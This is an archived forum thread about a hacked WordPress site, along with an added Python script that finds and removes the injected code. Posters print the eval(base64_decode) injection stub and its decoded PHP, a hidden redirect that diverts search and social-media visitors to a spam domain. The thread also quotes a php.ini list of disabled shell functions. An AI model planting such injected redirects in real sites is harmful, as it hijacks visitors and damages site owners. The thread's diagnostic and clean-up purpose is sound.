Forums

The forums ran from 2008-2020 and are now closed and viewable here as an archive.

Something's gone terribly wrong, what do I do?

  • #36691
    Ash149
    Participant

    Hey,

    So I have no idea what has happened, but I just logged in to my server via Coda to make some changes to a WordPress theme and basically it looks like all the PHP files have changed; they all look like this:

    That’s just a small amount from the single.php page. I’m guessing it has something to do with the encoding, perhaps? I’ve had a look at the files through the WordPress admin and they are all the same. I did log in to another FTP yesterday; could that have something to do with it? Perhaps it changed the default encoding Coda used?

    The website is working fine at the moment, thankfully, but I’m really worried about it. What will happen when I need to make changes? Can I change it back somehow?

    Any help is really, really appreciated…

    Thanks!

    Ash

    #96812
    bungle
    Member

    Looks like you have been subject to an exploit.

    Try

    http://wordpress.org/extend/plugins/exploit-scanner/

    #96826
    mwdewitt
    Member

    This is why it is always good practice to keep recent back-ups of your WordPress websites if at all possible.

    #96827
    noahgelman
    Participant

    Yup. What that “base64_decode” means is that the JavaScript was encoded into base64. It’s very easy to decode. Create the file here on your desktop and you can paste in the code and have it decoded for you.

    Here is an example of the first line:


    which equals:

    // Decoded payload as posted. The $_SERVER array keys were evidently stripped by the
    // forum (the variable names make them clear), so they are restored here; the regex
    // escaping is left exactly as it was posted.
    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm){
        $referer=$_SERVER['HTTP_REFERER'];
        $uag=$_SERVER['HTTP_USER_AGENT'];
        if ($uag) {
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex.ru/yandsearch?(.*?)&lr=/",$referer) or preg_match("/google.(.*?)/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: LINK REMOVED");
                    exit();
                }
            }
        }
    }

    Basically it’s some code to redirect your traffic to their page, I believe. Probably to farm ad revenue. The other lines are also basically the same thing.

    I would change all your passwords and google around for other ways to make your website more secure.

    #96832
    mwdewitt
    Member

    In “Digging Into WordPress” by Chris Coyier, he goes over some tactics to make it a little more difficult for hackers to break into your website. Also, it’s a very good read for WordPress entrepreneurs.

    #96839
    Ash149
    Participant

    Ah! Thanks for the help everyone. I have managed to back up most of the folders, so will keep on going, and will definitely check out the Digging Into WordPress book…

    Gonna have to change every password now, aren’t I?

    Ash

    #96842
    Ash149
    Participant

    OK, I don’t know if this is something to worry about or not, but this file is in my root folder and I’m not sure if it’s supposed to be or not. It’s called “php.ini” and it’s got the following in it:

    register_globals = off
    allow_url_fopen = off

    expose_php = Off
    max_input_time = 60
    variables_order = "EGPCS"
    extension_dir = ./
    upload_tmp_dir = /tmp
    precision = 12
    SMTP = relay-hosting.secureserver.net
    url_rewriter.tags = "a=href,area=href,frame=src,input=src,form=,fieldset="


    ; Only uncomment zend optimizer lines if your application requires Zend Optimizer support

    ;[Zend]
    ;zend_optimizer.optimization_level=15
    ;zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-3.3.3
    ;zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-3.3.3
    ;zend_extension=/usr/local/Zend/lib/Optimizer-3.3.3/ZendExtensionManager.so
    ;zend_extension_ts=/usr/local/Zend/lib/Optimizer_TS-3.3.3/ZendExtensionManager_TS.so


    ; -- Be very careful to not to disable a function which might be needed!
    ; -- Uncomment the following lines to increase the security of your PHP site.

    ;disable_functions = "highlight_file,ini_alter,ini_restore,openlog,passthru,
    ; phpinfo, exec, system, dl, fsockopen, set_time_limit,
    ; popen, proc_open, proc_nice,shell_exec,show_source,symlink"

    Is that part of the hack or something to do with my host/wordpress?

    Thanks again, this is a nightmare, eh!

    #96854
    bungle
    Member

    Yeah, that should be there.

    #98210
    kamran9868
    Participant

    The same situation happened with a client. He owns 30 sites on one cPanel and all the PHP files got infected with this base64 code, and when I decoded it I found that it’s just an exploit to get traffic to a few of the sites…
    There is only one way: download all files, clean them of this code and upload them again. Why these files got infected is just a mystery. Still figuring it out. Also read a good discussion board for this problem: http://redleg-redleg.blogspot.com/2012/02/costabrava-bee-pl.html?showComment=1330986257272#c6640785865930412418

    Searching for the security issue next to avoid such a problem again. And if anybody has found a solution then please advise.

    Regards

    #98211
    kamran9868
    Participant

    The actual base64 code is this:

    eval(base64_decode("[base64 payload omitted]"));
    define( "WP_INSTALLING", true );

    and after decoding I found this:

    // Decoded payload as posted. The $_SERVER array keys were evidently stripped by the
    // forum (the variable names make them clear), so they are restored here; the regex
    // escaping is left exactly as it was posted.
    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm)
    {
        $referer=$_SERVER['HTTP_REFERER'];
        $uag=$_SERVER['HTTP_USER_AGENT'];
        if ($uag)
        {
            if (stristr($referer,"yahoo") or
                stristr($referer,"bing") or
                stristr($referer,"rambler") or
                stristr($referer,"gogo") or
                stristr($referer,"live.com") or
                stristr($referer,"aport") or
                stristr($referer,"nigma") or
                stristr($referer,"webalta") or
                stristr($referer,"begun.ru") or
                stristr($referer,"stumbleupon.com") or
                stristr($referer,"bit.ly") or
                stristr($referer,"tinyurl.com") or
                preg_match("/yandex.ru/yandsearch?(.*?)&lr=/",$referer) or
                preg_match("/google.(.*?)/url/",$referer) or
                stristr($referer,"myspace.com") or
                stristr($referer,"facebook.com") or
                stristr($referer,"aol.com"))
            {
                if (!stristr($referer,"cache") or
                    !stristr($referer,"inurl"))
                {
                    header("Location: http://froling(dot)bee(dot)pl/"); exit();
                }
            }
        }
    }

    Note: I changed the URL of the header location in the code so nobody can click it accidentally. Thanks Karlpcrowley for pointing this issue out to me.
    Cleaning files one by one is really tedious work …

    #98233
    kamran9868
    Participant

    Yeah, sure … I just changed the URL … Well, I’d been googling and I found this article very useful for finding malicious code on a hacked server… it’s a script, lookforbadguys, which can help find infected files and code bugs.
    I hope this may help.
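
The decode step noahgelman walks through above and the file-by-file clean-up kamran9868 describes can be scripted. This is an added Python example, not code from the thread or from the lookforbadguys script: it finds eval(base64_decode("...")) stubs in PHP source, decodes them, reports the redirect target, and strips only those stubs whose decoded payload matches the redirect code quoted in this thread, leaving unrelated base64 use alone. All function names, the sample file and the example.invalid redirect host are constructed for the example.

```python
import base64
import re
from pathlib import Path

# Prefix injected at the top of each PHP file in this thread: eval(base64_decode("<blob>"));
INJECT_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;?', re.I)
# Strings present in the decoded redirect stub; unrelated base64 use is left alone.
PAYLOAD_MARKERS = ("headers_sent", "HTTP_REFERER", "Location:")

def decode_payload(b64: str) -> str:
    """Decode one blob; '' if it is not valid base64 (then it cannot be this stub)."""
    try:
        return base64.b64decode(b64, validate=True).decode("latin-1")
    except ValueError:
        return ""

def scan_source(src: str) -> list:
    """(decoded_stub, redirect_target) for every eval(base64_decode()) in one file's text."""
    findings = []
    for m in INJECT_RE.finditer(src):
        decoded = decode_payload(m.group(1))
        target = re.search(r'header\s*\(\s*["\']Location:\s*([^"\']+)', decoded)
        findings.append((decoded, target.group(1).strip() if target else None))
    return findings

def clean_source(src: str):
    """Strip only stubs whose payload carries the redirect markers; return (cleaned, removed)."""
    removed = 0
    def repl(m):
        nonlocal removed
        if any(mark in decode_payload(m.group(1)) for mark in PAYLOAD_MARKERS):
            removed += 1
            return ""
        return m.group(0)
    return INJECT_RE.sub(repl, src), removed

def scan_tree(root: str) -> list:
    """(path, redirect_target) for every infected *.php under root; read-only."""
    return [(str(p), target) for p in Path(root).rglob("*.php")
            for _d, target in scan_source(p.read_text(errors="replace"))]

# Constructed sample modelled on the decoded stub quoted in this thread, not a real capture.
SAMPLE_STUB = ('error_reporting(0);$qazplm=headers_sent();if(!$qazplm){'
               '$referer=$_SERVER["HTTP_REFERER"];if(stristr($referer,"google")){'
               'header("Location: http://example.invalid/");exit();}}')
SAMPLE_FILE = ('<?php eval(base64_decode("%s"));\ndefine( "WP_INSTALLING", true );\n'
               % base64.b64encode(SAMPLE_STUB.encode()).decode())
```

Run scan_tree over a copy of the site first to list infected files and their redirect targets, then apply clean_source and diff the result against a known-good copy of the theme before uploading.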

    #98237
    kamran9868
    Participant

    Got one more good article for this here: http://www.she-geeks.com/tag/malicious-eval-base64-code/ Also check http://sucuri.net/; they seem good to fix the issue.
